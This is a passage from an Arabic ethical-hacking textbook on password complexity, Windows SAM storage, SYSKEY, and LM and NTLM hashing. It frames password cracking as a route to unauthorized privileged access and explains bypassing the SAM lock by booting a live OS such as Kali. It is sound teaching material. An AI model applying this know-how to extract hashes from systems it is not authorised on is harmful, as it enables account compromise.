‫اﻟﺿﻌﯾﻔﺔ أو ﺗﺧﻣﯾﻧﮭﺎ ﺑﺳﮭوﻟﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪313‬‬

‫ﺗﻌﻘﯾدات ﻛﻠﻣﺎت اﻟﺳر ‪PASSWORD COMPLEXITY‬‬

‫ﺗﻌﻘﯾد ﻛﻠﻣﺔ اﻟﻣرور )‪ (Password Complexity‬ﯾﻠﻌب دورا رﺋﯾﺳﯾﺎ ﻓﻲ ﺗﺣﺳﯾن اﻷﻣن ﺿد اﻟﮭﺟﻣﺎت‪ .‬ذﻟك ھو اﻟﻌﻧﺻر اﻟﮭﺎم اﻟذي ﯾﺟب‬
‫ﻋﻠﻰ اﻟﻣﺳﺗﺧدﻣﯾن ﺿﻣﺎﻧﮫ أﺛﻧﺎء إﻧﺷﺎء ﻛﻠﻣﺔ ﻣرور‪ .‬ﯾﺟب أﻻ ﺗﻛون ﻛﻠﻣﺔ اﻟﻣرور ﺑﺳﯾطﺔ ﺣﯾث ان ﻛﻠﻣﺎت اﻟﻣرور اﻟﺑﺳﯾط ﻋرﺿﺔ ﺑﺳﮭوﻟﮫ‬
‫ﻟﻠﮭﺟﻣﺎت‪ .‬ﯾﺟب أن ﺗﻛون ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ اﺧﺗرﺗﮭﺎ داﺋﻣﺎ ﻣﻌﻘدة وطوﯾﻠﺔ‪ ،‬وﯾﺻﻌب ﺗذﻛرھﺎ‪ .‬ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗﻘوم ﺑﺈﻋدادھﺎ ﻟﺣﺳﺎﺑك ﯾﺟب‬
‫أن ﺗﺳﺗوﻓﻲ ﻣﺗطﻠﺑﺎت إﻋدادات ﻧﮭﺞ اﻟﺗﻌﻘﯾد‪ .‬ﯾﺟب أن ﺗﻛون اﻷﺣرف ﻛﻠﻣﺔ ﻣرور ﻣزﯾﺞ ﻣن اﻷﺣرف اﻷﺑﺟدﯾﺔ واﻟرﻗﻣﯾﺔ‪ .‬ﺗﺗﻛون ﻣن أﺣرف‬
‫أﺑﺟدﯾﺔ رﻗﻣﯾﺔ ﻣن اﻟﺣروف واﻷرﻗﺎم وﻋﻼﻣﺎت اﻟﺗرﻗﯾم‪ ،‬واﻟرﯾﺎﺿﯾﺔ وﻏﯾرھﺎ ﻣن اﻟرﻣوز اﻟﺗﻘﻠﯾدﯾﺔ‪ .‬ﻓﺎﻧظر اﻟﻰ ﺑﻌض اﻣﺛﻠﺔ ﻛﻠﻣﺎت اﻟﻣرو ﻛﺎﻻﺗﻰ‪:‬‬
‫‪- Passwords that contain letters, special characters, and numbers: ap1@52‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺣروف واﺷﻛﺎل ﺧﺎﺻﮫ وأرﻗﺎم‪.‬‬
‫‪- Passwords that contain only numbers: 23698217‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ارﻗﺎم ﻓﻘط‪.‬‬
‫)‪- Passwords that contain only special characters :&*#@!(%‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي اﺷﻛﺎل ﺧﺎﺻﮫ ﻓﻘط‪.‬‬
‫‪- Passwords that contain letters and numbers: meet123‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺣروف وأرﻗﺎم‪.‬‬
‫‪- Passwords that contain only letters: PUTHMYDE‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺣروف ﻓﻘط‪.‬‬
‫‪- Passwords that contain only letters and special characters: bob@&ba‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺣروف واﺷﻛﺎل ﺧﺎﺻﮫ‪.‬‬
‫‪- Passwords that contain only special characters and numbers: 123@$4‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ اﺷﻛﺎل ﺧﺎﺻﮫ وأرﻗﺎم‪.‬‬
‫ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ اﻟﮭدف ﻣن ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ھو اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﻌطﯾﻧﺎ اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ اﻟﻰ اﻟﻧظﺎم اﻟﮭدف ﻣﻊ‬
‫ﺻﻼﺣﯾﺎت اﻋﻠﻰ‪ ،‬وﻟﻛن ﻗﺑل ذﻟك ﺳوف ﻧﺗطرق اﻟﻰ طرﯾﻖ ﻣﺻﺎدﻗﮫ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل وطرق ﺗﺧزﯾﻧﮭﺎ ﻟﻛﻠﻣﺎت اﻟﻣرور‪.‬‬

‫‪Microsoft Authentication‬‬

‫ﻣﻌظم اﻟﻧظم اﻟﺗﻲ ﺗﺳﺗﺧدم آﻟﯾﺔ ﻣﺻﺎدﻗﺔ ﻛﻠﻣﺔ اﻟﻣرور ﺗﺣﺗﺎج إﻟﻰ ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ھذه )أو اﻟﮭﺎش اﻟﺧﺎﺻﺔ ﺑﮭم( ﻣﺣﻠﯾﺎ ﻋﻠﻰ اﻟﺟﮭﺎز‪ .‬ھل‬
‫ھذا ﺻﺣﯾﺢ ﻷﻧظﻣﺔ اﻟﺗﺷﻐﯾل )وﯾﻧدوز‪ ،‬ﻟﯾﻧﻛس‪ ،‬وﺳﯾﺳﻛو ‪ ،(IOS‬وأﺟﮭزة اﻟﺷﺑﻛﺔ )اﻟراوﺗر واﻟﺳوﯾﺗﺷﺎت(‪.‬‬

‫‪SAM Database‬‬
‫ﻣﻌظم أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺗﺧزن ھﺎش ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة )‪ (Encrypted Password Hash‬ﻓﻲ ﻣﻛﺎن واﺣد‪ .‬ﻓﻲ اﻷﻧظﻣﺔ اﻟﻣﺳﺗﻧدة إﻟﻰ‬
‫‪ ،Windows‬ﯾﺗم ﺗﺧزﯾن اﻟﮭﺎش ﻓﻲ ﻣﻠف ﺧﺎص ﯾﺳﻣﻰ )‪.(SAM‬‬
‫ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ SAM‬ھﻲ اﺧﺗﺻﺎر ﻠ ‪ .Security Accounts Manager database‬ﺗﺳﺗﺧدم ﻣن ﻗﺑل وﯾﻧدوز ﻹدارة ﺣﺳﺎﺑﺎت‬
‫اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﺷﻛل اﻟﮭﺎش )‪) (hashed format‬ذات اﺗﺟﺎه واﺣد(‪ .‬ﺣﯾث ﻻ ﯾﺗم ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﺳر أﺑدا ﻓﻲ ﺷﻛﻠﮭﺎ‬
‫اﻟﻌﺎدي‪ .‬ﻟﻛن ﯾﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﺷﻛل اﻟﮭﺎش ﻟﯾﺗم ﺣﻣﺎﯾﺗﮭﺎ ﻣن اﻟﮭﺟﻣﺎت‪ .‬ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ SAM‬ﯾﺗم ﺗﻧﻔﯾذھﺎ ﻛﻣﻠف رﺟﯾﺳﺗري)‪. (registry file‬‬
‫اﻷﻧظﻣﺔ اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ ‪ Windows NT‬ﺑﻣﺎ ﻓﻲ ذﻟك وﯾﻧدوز ‪ ،2000‬واﻻﺻدارات اﻟﺗﻲ ﺗﻠﯾﮭم‪ ،‬ﯾﺗم وﺿﻊ اﻟﻣﻠف ‪ SAM‬ﻓﻲ اﻟﻣﺳﺎر‬
‫)\‪ .(C:\Windows\System32\Config‬اﻵن ﺑﻌد أن ﺗﻌرﻓﻧﺎ ﻋﻠﻰ ﻣوﻗﻊ اﻟﻣﻠف‪ ، SAM‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻻﺳﺗﺧراج ھﺎش ﻛﻠﻣﺎت اﻟﻣرور ﻣن‬
‫اﻟﻣﻠف‪ .‬وﻷن اﻟﻣﻠف ‪ SAM‬ﯾﺣﻣل ﺑﻌض اﻟﻣﻌﻠوﻣﺎت اﻟﮭﺎﻣﺔ ﺟدا‪ ،‬ﻓﺄن ﻣﺎﯾﻛروﺳوﻓت ﻗد أﺿﺎﻓت ﺑﺣﻛﻣﺔ ﺑﻌض اﻟﻣﯾزات اﻷﻣﻧﯾﺔ اﻹﺿﺎﻓﯾﺔ‬
‫ﻟﻠﻣﺳﺎﻋدة ﻓﻲ ﺣﻣﺎﯾﺔ ھذا اﻟﻣﻠف‪.‬‬
‫اﻟﺣﻣﺎﯾﺔ اﻷوﻟﻰ ھﻲ أن اﻟﻣﻠف ‪ SAM‬ﯾﺗم ﻏﻠﻘﮫ ﻓﻲ اﻟﺣﻘﯾﻘﺔ ﻋﻧد ﺑداﯾﺔ ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ھذا ﯾﻌﻧﻲ أﻧﮫ ﻓﻲ ﺣﯾن ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾس‬
‫ﻟدﯾﻧﺎ اﻟﻘدرة ﻋﻠﻰ ﻓﺗﺢ أو ﻧﺳﺦ اﻟﻣﻠف ‪ .SAM‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ھذا اﻟﻘﻔل‪ ،‬ﯾﺗم ﺗﺷﻔﯾر اﻟﻣﻠف ‪ SAM‬ﻛﺎﻣل وﻏﯾر ﻗﺎﺑل ﻟﻠﻌرض‪.‬‬
‫ﻟﺣﺳن اﻟﺣظ‪ ،‬ھﻧﺎك طرﯾﻘﺔ ﻟﺗﺟﺎوز ھذه اﻟﻘﯾود ﻋﻠﻰ ﺣد ﺳواء‪ .‬ﻓﺎذا ﻛﺎن ﻟدﯾﻧﺎ اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ اﻟﻧظﺎم‪ ،‬ﻓﺄن أﺑﺳط طرﯾﻘﺔ ﻟﺗﺟﺎوز ھذه اﻟﺣﻣﺎﯾﺔ‬
‫ھو اﺳﺗﺧدام ﻧظﺎم ﺗﺷﻐﯾل ﺑدﯾل ﻣﺛل ﻛﺎﻟﻲ)‪ . (Live OS‬ﺑواﺳطﺔ اﺳﺗﺧدام ﻧظﺎم ﺗﺷﻐﯾل ﺑدﯾل ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪ ،‬ﻓﻧﺣن ﻗﺎدرون ﻋﻠﻰ ﺗﺟﺎوز‬
‫ﺗﺄﻣﯾن اﻟوﯾﻧدوز ﻟﻠﻣﻠف ‪ .SAM‬ھذا ﻣﻣﻛن ﻷن ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻻ ﯾﺑدأ‪ ،‬ﻓﺎذا اﻟﻘﻔل ﻟن ﯾﻌﻣل أﺑدا‪ ،‬وﻧﻛون أﺣرار ﻓﻲ اﻟوﺻول إﻟﻰ اﻟﻣﻠف‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪314‬‬

‫‪ .SAM‬ﻟﻸﺳف‪ ،‬ﻻ ﯾزال ﺗﺷﻔﯾر اﻟﻣﻠف ‪ ،SAM‬ﻟذﻟك ﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ اﺳﺗﺧدام أداة ﻟﻠوﺻول إﻟﻰ اﻟﮭﺎش‪ .‬ﻟﺣﺳن اﻟﺣظ‪ ،‬ﯾوﺟد اﻟﻌدﯾد ﻣن‬
‫اﻷدوات ﻟﻠوﺻول اﻟﻰ اﻟﮭﺎش وﺗرﺟﻣﻧﮫ اﻟﻰ ﻧص ﻋﺎدى‪ .‬أﯾﺿﺎ ﯾﻣﻛن ﻧﺳﺦ ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ‪ SAM‬ﻋﻠﻰ اﻟﻘرص ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت ﻣﺧﺗﻠﻔﺔ‪.‬‬
‫ﻋرﺿت ﺷرﻛﺔ ﻣﺎﯾﻛروﺳوﻓت وظﯾﻔﺔ ‪ SYSKEY‬ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ‪ Windows NT 4.0‬ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺗﺣﺳﯾن أﻣن ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت ‪SAM‬‬
‫ﺿد اﻟﺑرﻣﺟﯾﺎت اﻟﻣﺗواﺟد ﺣﺎﻟﯾﺎ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬
‫ﺗﻘوم اداة ‪ SYSKEY‬ﻋﻠﻰ ﺗﺷﻔﯾر ﻣﻌﻠوﻣﺎت ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﻛﻠﻣﺔ ﻣرور ﻣدﯾر أﻣن اﻟﺣﺳﺎﺑﺎت )‪ (SAM‬اﻟﺗﻲ ﺗﺳﺗﺧدم داﻟﺔ اﻟﮭﺎش ﻓﻲ ﻧظﺎم‬
‫وﯾﻧدوز واﻟﺗﻲ ﺗﺳﺗﺧدم ﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر ‪ 128‬ﺑت‪ .‬ﻛﺎﻧت أداة ‪ SYSKEY‬ﻣﯾزة اﺧﺗﯾﺎرﯾﺔ ﻓﻲ ﻧظﺎم وﯾﻧدوز إن ﺗﻲ ‪ .4.0‬وﻛﺎن ﻣن اﻟﻣﻔﺗرض ﻟﮭﺎ‬
‫ان ﺗﻘوم ﺑﺣﻣﺎﯾﺔ ﻣﻌﻠوﻣﺎت ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﻛﻠﻣﺔ ﻣرور ﻣدﯾر أﻣن اﻟﺣﺳﺎﺑﺎت )‪ (SAM‬ﻟﻠﺣﻣﺎﯾﺔ ﻣن ھﺟﻣﺎت اﻻﺧﺗراق داﺧل اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ وﻟﺗﺑﻘﻰ‬
‫اﻟﻣﻌﻠوﻣﺎت آﻣﻧﺔ ﺣﺗﻰ ﻟو ﺗم ﻧﺳﺧﮭﺎ‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﻲ دﯾﺳﻣﺑر ﻣن ﻋﺎم ‪ 1999‬م ﻋﺛر ﻓرﯾﻖ أﻣﻧﻲ ﻣن ‪BindView‬ﻋﻠﻰ ﺛﻐرة أﻣﻧﯾﺔ ﻓﻲ اﻷداة‬
‫ﺗﺟﻌل ﻣن اﻟﻣﻣﻛن اﻻﺧﺗراق ﺣﺗﻰ داﺧل اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ﺑﺎﺳﺗﺧدام ﻧوع ﻣﻌﯾن ﻣن أداة ﺗﺣﻠﯾل اﻟﺷﻔرات‪ . cryptanalytic‬وھذا ﯾﺗﯾﺢ اﻻﺧﺗراق‬
‫ﻣن ﻧوع ‪ brute force‬اﻟذي ﯾﺳﺗﮭدف أي ﺿﻌف ﻓﻲ ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت اﻟﻣﺷﻔرة‪.‬‬
‫ﻓﯾﻣﺎ ﺑﻌد‪ ،‬ﺗﻌﺎوﻧت ﻣﺎﯾﻛروﺳوﻓت ﻣﻊ ﻓرﯾﻖ ‪ BindView‬ﻟﺗﺳوﯾﺔ ھذه اﻟﻣﺷﻛﻠﺔ اﻟﺗﻲ ﻋرﻓت ﻻﺣﻘﺎ ﺑﺎﺳم ﺧﻠل ﺳﯾﺳﻛﻲ '‪ 'Syskey Bug‬وأﻋﻠن‬
‫ﺑﻌد ذﻟك أن اﻻداة ‪ Syskey‬آﻣﻧﺔ ﺑﺎﻟﻘدر اﻟﻛﺎﻓﻲ ﻟﺻد اي ﻧوع ﻣن اﻻﺧﺗراﻗﺎت‪.‬‬
‫ﺣﺗﻰ ﻟو ﺗم اﻛﺗﺷﺎف اﻟﻣﺣﺗوﯾﺎت ﻣن ﻗﺑل ﺑﻌض اﻟﺣﯾل‪ ،‬ﻓﺎﻧﮫ ﯾﺗم ﺗﺷﻔﯾر اﻟﻣﻔﺎﺗﯾﺢ ﺑﺎﺳﺗﺧدام اﻟﮭﺎش ذات اﻻﺗﺟﺎه اﻟواﺣد‪ ،‬ﻣﻣﺎ ﯾﺟﻌل ﻣن اﻟﺻﻌب‬
‫ﻛﺳره‪ .‬أﯾﺿﺎ‪ ،‬ﺑﻌض اﻹﺻدارات ﻟدﯾﮭﺎ ﻣﻔﺗﺎح ﺛﺎﻧوي‪ ،‬ﻣﻣﺎ ﯾﺟﻌل اﻟﺗﺷﻔﯾر ﻣﺣددة ﻟﮭذه اﻟﻧﺳﺧﺔ ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل‪.‬‬
‫ھذا اﻟﻣﻠف ﯾﻣﻛن اﯾﺟﺎده ﻣن ﺧﻼل ھذا اﻟﻣﺳﺎر)‪ (%SYSTEMROOT%\system32\config‬وﻟﻛن ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ اﻧﮫ ﻻ ﯾﻣﻛن اﻟﺗﻌدﯾل‬
‫ﻓﯾﮫ او ﻗراءﺗﮫ او ﻧﺳﺧﮫ طﺎﻟﻣﺎ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾﻌﻣل‪.‬‬
‫ﻟﻠﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋن ھذا اﻟﻣﻠف ﯾﻣﻛن اﻻطﻼع ﻋﻠﯾﮫ ﻣن ﺧﻼل اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://technet.microsoft.com/library/cc723740.aspx‬‬
‫ﻟﻠﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﮭﺎش ﯾﻣﻛن اﻻطﻼع ﻋﻠﯾﮫ ﻣن ﺧﻼل اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://en.wikipedia.org/wiki/Cryptographic_hash_function‬‬
‫ﻣﻠﺣوظﮫ‪ :‬ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ ان ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾﻘوم ﺑﺗﺧزﯾن ﺑﯾﺎﻧﺎت اﻟﺗﺳﺟﯾل ﻓﻲ اﻟﻣﻠف ‪ ،SAM‬ﻟﻛن ﯾوﺟد اﺳﺗﺛﻧﺎء اﻧﮫ ﻋﻧد رﺑط اﻟﺟﮭﺎز ﺑﺎل‬
‫‪ Active Directory‬ﻓﺎﻧﮫ ﯾﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت)‪. (Active Directory‬‬
‫ﻛﯿﻒ ﯾﺘﻢ ﺗﺨﺰﯾﻦ ھﺎش ﻛﻠﻤﺔ اﻟﻤﺮور ﻓﻲ اﻟﻤﻠﻒ ‪(How Hash Passwords Are Stored in Window SAM) SAM‬؟‬

‫ﯾﺗم ﺗﺧزﯾن ﺳﺟﻼت اﻟﻣﺳﺗﺧدم ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت )‪ (SAM‬أو ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ .Active Directory‬وﯾرﺗﺑط ﻛل ﺣﺳﺎب ﻣﺳﺗﺧدم ﻣﻊ اﺛﻧﯾن‬
‫ﻣن ﻛﻠﻣﺎت ﻣرور‪ :‬اﻷوﻟﻰ ‪ LAN Manager-compatible password‬واﻟﺛﺎﻧﯾﺔ ‪ .Windows password‬ﻛل ﻛﻠﻣﺔ ﻣرور ﯾﺗم‬
‫ﺗﺷﻔﯾرھﺎ وﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ SAM‬أو ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪.Active Directory‬‬

‫‪ The LAN Manager-compatible password‬ﺗﻛون ﻣﺗواﻓﻘﺔ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗﺳﺗﺧدم ‪ .LM hash‬ﻛﻠﻣﺔ اﻟﻣرور ھذه ﻗﺎﺋﻣﮫ‬
‫ﻋﻠﻰ ‪ .the original equipment manufacturer (OEM) character‬ﻛﻠﻣﺔ اﻟﻣرور ھذه ﻟﯾﺳت ﺣﺳﺎﺳﺔ ﻟﺣﺎﻟﺔ اﻷﺣرف‪ ،‬وﯾﻣﻛن‬
‫أن ﯾﺻل إﻟﻰ ‪ 14‬ﺣرﻓﺎ ً‪ .‬ﯾﻌرف أﯾﺿﺎ إﺻدار ‪ OWF‬ﻟﻛﻠﻣﺔ اﻟﻣرور ھذه ب ‪ LAN Manager OWF‬أو ‪ .ESTD‬وﯾﺗم ﺗﺷﻔﯾر ﻛﻠﻣﺔ‬
‫اﻟﻣرور ھذه ﺑﺎﺳﺗﺧدام ﺗﺷﻔﯾر ‪.DES‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪315‬‬

‫‪ (NTLM) Windows password‬ﯾﺳﺗﻧد إﻟﻰ ﻣﺟﻣوﻋﺔ أﺣرف ‪ .Unicode‬ﻛﻠﻣﺔ اﻟﻣرور ھذه ﺣﺳﺎس ﻟﺣﺎﻟﺔ اﻷﺣرف‪ ،‬وﯾﻣﻛن أن ﺗﺻل‬
‫إﻟﻰ ‪ 128‬ﺣرﻓﺎ ً‪ .‬ﯾﻌرف أﯾﺿﺎ إﺻدار ‪ OWF‬ﻣن ﻛﻠﻣﺔ اﻟﻣرور ھذه ب ‪ .Windows OWF‬ﻛﻠﻣﺔ اﻟﺳر ھذه ﯾﺗم ﺣﺳﺎﺑﮭﺎ ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺔ‬
‫اﻟﺗﺷﻔﯾر ‪.RSA MD--4‬‬
‫ﯾﺗم ﺗﻌطﯾل إﻧﺷﺎء وﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻋﻠﻰ ھﯾﺋﺔ ‪ valid LM hash‬ﻓﻲ اﻟﻌدﯾد ﻣن إﺻدارات اﻟوﯾﻧدوز‪ .‬ھذا ھو اﻹﻋداد اﻻﻓﺗراﺿﻲ ﻟﻧظﺎم‬
‫اﻟﺗﺷﻐﯾل ‪ Windows Vista‬و‪ LM hash .Windows 7‬ﯾﻣﻛن أن ﯾﻛون ﻓﺎرﻏﺎ ﻓﻲ اﻹﺻدارات اﻟﺗﻲ ﯾﻛون ﻓﯾﮭﺎ ‪ LM hash‬ﻏﯾر ﻣﻔﻌل‬
‫)‪ .(disabled‬ﺗﺣدﯾد اﻟﺧﯾﺎر ﻹزاﻟﺔ ‪ LM hash‬ﺗﻣﻛن ﻓﺣوﺻﺎت إﺿﺎﻓﯾﺔ ﺧﻼل ﻋﻣﻠﯾﺔ ﺗﻐﯾر ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬وﻟﻛﻧﮫ ﻻ ﯾزﯾل ﻗﯾﻣﺔ ‪LM hash‬‬
‫ﻣوﺟودة ﻓﻲ اﻟﻣﻠف ‪ .SAM‬ﺗﻔﻌﯾل ﺧﯾﺎر اﻟﻔﺣوﺻﺎت إﺿﺎﻓﯾﺔ ﯾﺧزن ﻗﯾﻣﺔ "‪ "dummy‬ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ SAM‬وﻟﯾس ﻟﮫ ﻋﻼﻗﺔ ﺑﻛﻠﻣﺔ ﻣرور‬
‫اﻟﻣﺳﺗﺧدم وﻧﻔﺳﮫ ﺑﺎﻟﻧﺳﺑﺔ ﻟﺟﻣﯾﻊ ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪.‬‬

‫ﻻ ﯾﻣﻛن ﺣﺳﺎب ‪ LM hash‬ﻟﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﺗزﯾد ﻋن ‪ 14‬ﺣرﻓﺎ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﺗم ﺗﻌﯾﯾن ﻗﯾﻣﺔ ‪ LM hash‬إﻟﻰ اﻟﻘﯾﻣﺔ "‪ "dummy‬ﻋﻧد ﯾﺿﻊ‬

‫اﻟﻣﺳﺗﺧدم أو ﻣﺳؤول اﻟﻧظﺎم ﻛﻠﻣﺔ ﻣرور أﻛﺛر ﻣن ‪ 14‬ﺣرﻓﺎ‪.‬‬


‫ﻣﺎ ھﻮ )‪LAN Manager hash (LM hash‬؟‬

‫‪ The LAN manager hash‬ھو اﻟﮭﺎش اﻷوﻟﻰ او اﻟرﺋﯾﺳﻲ اﻟذى ﯾﺳﺗﺧدﻣﮫ ﻛل ﻣن ‪ Microsoft LAN Manager‬و ‪Microsoft‬‬
‫‪ Windows‬ﻟﺗﺧزﯾن ﻛﻠﻣﺎت ﻣرور اﻟﻣﺳﺗﺧدﻣﯾن ذات طول ﺣﺗﻰ ‪ 14‬ﺣرﻓﺎ )‪ .(length up to 14 character‬ﻣﺳﺗﺧدم ﻓﻲ ﺟﻣﯾﻊ‬
‫إﺻدارات ﻣﺎﯾﻛروﺳوﻓت وﯾﻧدوز ﻗﺑل إﻟﻰ‪ . Windows NT‬واﺳﺗﻣرت ﻓﻲ اﻹﺻدار اﻷﺣدث ﻣن ‪ Windows‬ﻣن أﺟل اﻟﺗواﻓﻘﯾﺔ‪ ،‬وﻟﻛن ﯾﺗم‬
‫اﻟﺗوﺻﯾﺔ ﻣن ﻗﺑل ﻣﺎﯾﻛروﺳوﻓت ﻟﻠﻣﺳﺋول ﻟﯾﺗم إﯾﻘﺎﻓﮫ‪.‬‬
‫‪ Microsoft Windows NT‬ﯾﻌﻣل ﻋﻠﻰ ﺗﺧزﯾن ﻧوﻋﯾن ﻣن ﻛﻠﻣﺎت اﻟﻣرور‪ LAN Manager (LM) password :‬و ‪Windows NT‬‬
‫‪ .password‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻟﻧﻔﺗرض ان ﻛﻠﻣﺔ اﻟﺳر ھو '‪ .‘ 123456qwerty‬ﻋﻧدﻣﺎ ﯾﺗم ﺗﺷﻔﯾر ﻛﻠﻣﺔ اﻟﻣرور ھذه ﻣﻊ ﺧوارزﻣﯾﺔ ‪،LM‬‬
‫ﻓﺎﻧﮫ ﯾﺗم ﺗﺣوﯾﻠﮭﺎ أوﻻ إﻟﻰ أﺣرف ﻛﺑﯾرة‪ .‘ 123456QWERTY’ :‬إذا ﻛﺎن طول ﻛﻠﻣﺔ اﻟﻣرور ﻟﯾس ‪ 14‬ﺣرﻓﺎ‪ ،‬ﻓﺎﻧﮫ ﯾﺗم ﺗﻌﺑﺋﺔ ﻣﻊ أﺣرف‬
‫ﻓﺎرﻏﺔ )‪ (Null\blank character‬ﻟﺟﻌل طوﻟﮭﺎ ‪ 14‬ﺣرﻓﺎ‪ .‬ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﯾﻔﺗرض ان ﺗﺻﺑﺢ اﻟﻛﻠﻣﺔ ﻛﺎﻻﺗﻰ '_‪.’123456QWERTY‬‬
‫ﻗﺑل ﺗﺷﻔﯾر‪ ،‬ﯾﺗم ﺗﻘﺳﯾم اﻷﺣرف ‪ 14‬ﻣن ﻛﻠﻣﺎت اﻟﻣرور إﻟﻰ ﻧﺻﻔﯾن ذات ﻣﺳﺎﺣﺔ ‪ .7 byte‬وھذا ﯾﻌﻧﻲ ﺳﻠﺳﻠﺔ اوﻟﻰ ﺳﺑﻌﺔ ﺑﺎﯾت ﻣﻊ‬
‫’‪ ‘123456Q‬وﺳﻠﺳﻠﺔ ﺛﺎﻧﯾﺔ ﺳﺑﻌﺔ اﻟﺑﺎﯾت ﻣﻊ ' _‪ .‘ WERTY‬ﺛم ﯾﺗم ﺗﺷﻔﯾر ﻛل ﺳﻠﺳﻠﺔ ﻋﻠﻰ ﺣدة واﻟﻧﺗﺎﺋﺞ ﯾﻛون ﻣﺗﺻﻼ ﻛﺎﻻﺗﻰ‪:‬‬

